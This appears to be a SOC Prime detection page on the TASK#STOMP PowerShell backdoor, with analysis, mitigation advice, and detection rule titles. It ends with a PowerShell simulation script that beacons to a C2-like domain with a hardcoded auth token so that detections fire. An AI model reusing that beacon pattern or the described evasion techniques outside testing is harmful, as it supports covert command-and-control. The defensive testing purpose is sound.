SOC Prime Bias: High

01 Oct 2026 07:43 UTC

TASK#STOMP: PowerShell Backdoor for Document Theft and Remote Access

Author Photo
SOC Prime Team linkedin icon Follow
TASK#STOMP: PowerShell Backdoor for Document Theft and Remote Access
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

TASK#STOMP is a resilient PowerShell-based backdoor that leverages VBScript orchestration to establish multiple persistence mechanisms. The malware uses runtime C# compilation to bypass TLS certificate validation and maintains two redundant C2 channels for espionage operations. Its capabilities include automated document theft, surveillance, and arbitrary remote command execution on compromised Windows systems.

Investigation

Securonix Threat Research conducted static and dynamic analysis of the script-driven Windows infection chain. Researchers decoded Base64-encoded payloads, including diag_pack.dat and win_conn_cfg.dat, and reconstructed the execution process tree. The investigation also uncovered timestomping, scheduled task rotation, and runtime .NET compilation techniques used to evade security detection.

Mitigation

Defenders should monitor suspicious process relationships, particularly wscript.exe or cscript.exe launching schtasks.exe with XML definitions stored in user-writable directories. Enabling PowerShell Script Block Logging and AMSI telemetry can help identify in-memory payload decoding. Blocking known C2 domains and detecting unexpected csc.exe child processes spawned by PowerShell can further disrupt execution.

Response

If TASK#STOMP activity is detected, responders should remove all persistence anchors in a coordinated manner, including scheduled tasks and Startup folder entries. Active VBScript and PowerShell instances associated with the WinDefendSvc directory should be terminated. Task XML files and staged .dat payloads should be preserved for forensic analysis before remediation.

Keywords: TASK#STOMP, PowerShell backdoor, VBScript, multi-anchor persistence, C# compilation, TLS certificate validation, redundant C2, document theft, surveillance, remote command execution, Securonix Threat Research, Base64, diag_pack.dat, win_conn_cfg.dat, timestomping, scheduled task rotation, .NET compilation, wscript.exe, cscript.exe, schtasks.exe, Script Block Logging, AMSI, csc.exe, WinDefendSvc.

Attack Flow

Detections

Possible System Enumeration (via cmdline)

SOC Prime Team
29 Sep 2026

Call Suspicious .NET Methods from Powershell (via powershell)

SOC Prime Team
29 Sep 2026

Suspicious Binary / Scripts in Autostart Location (via file_event)

SOC Prime Team
29 Sep 2026

Suspicious Scheduled Task (via audit)

SOC Prime Team
28 Sep 2026

LOLBAS WScript / CScript (via process_creation)

SOC Prime Team
25 Sep 2026

Suspicious Powershell Strings (via cmdline)

SOC Prime Team
24 Sep 2026

Powershell Executing File In Suspicious Directory Using Bypass Execution Policy (via cmdline)

SOC Prime Team
24 Sep 2026

Possible Delayed Execution Behavior (via cmdline)

SOC Prime Team
24 Sep 2026

IOCs (HashSha256) to detect: TASK#STOMP: PowerShell Backdoor for Document Theft and Remote Access

SOC Prime AI Rules
29 Sep 2026

IOCs (SourceIP) to detect: TASK#STOMP: PowerShell Backdoor for Document Theft and Remote Access

SOC Prime AI Rules
29 Sep 2026

IOCs (DestinationIP) to detect: TASK#STOMP: PowerShell Backdoor for Document Theft and Remote Access

SOC Prime AI Rules
29 Sep 2026

Detection of TASK#STOMP PowerShell C2 Communication [Windows Network Connection]

SOC Prime AI Rules
29 Sep 2026

Detect TASK#STOMP PowerShell Backdoor Activity [Windows Powershell]

SOC Prime AI Rules
29 Sep 2026

TASK#STOMP PowerShell Backdoor Detection [Windows Process Creation]

SOC Prime AI Rules
29 Sep 2026

Simulation Execution

  • Attack Narrative & Commands: The adversary has successfully established persistence on a workstation using a TASK#STOMP backdoor. To receive further instructions and exfiltrate stolen data, the malware initiates a PowerShell session. The script is designed to masquerade as legitimate web traffic by communicating with a domain that mimics a file-sharing service (corecloudfileshare.xyz). To ensure only the authorized backdoor can communicate with the C2, the script includes a hardcoded X-Auth-Token in the HTTP request headers. This specific combination of destination and header is the primary trigger for our detection logic.

  • Regression Test Script:

    # TASK#STOMP Simulation Script
    # Purpose: Mimic C2 communication to trigger detection rule
    
    $C2Domain = "http://corecloudfileshare.xyz/api/checkin"
    $Headers = @{
        "X-Auth-Token" = "STOMP_DEBUG_TOKEN_9928374"
        "User-Agent"   = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
    }
    
    Write-Host "[+] Initiating simulated C2 communication to $C2Domain..."
    try {
        # We use -ErrorAction SilentlyContinue because the domain won't resolve in a real test environment
        Invoke-WebRequest -Uri $C2Domain -Headers $Headers -Method Get -ErrorAction SilentlyContinue
        Write-Host "[+] Command sent."
    } catch {
        Write-Host "[!] Connection failed (Expected if domain is non-existent), but telemetry should be generated."
    }
  • Cleanup Commands:

    # No persistent artifacts created by the simulation script. 
    # If a file was dropped, use: Remove-Item -Path "C:pathtosimulated_malware.exe" -Force
    Write-Host "[+] Simulation cleanup complete. No artifacts removed."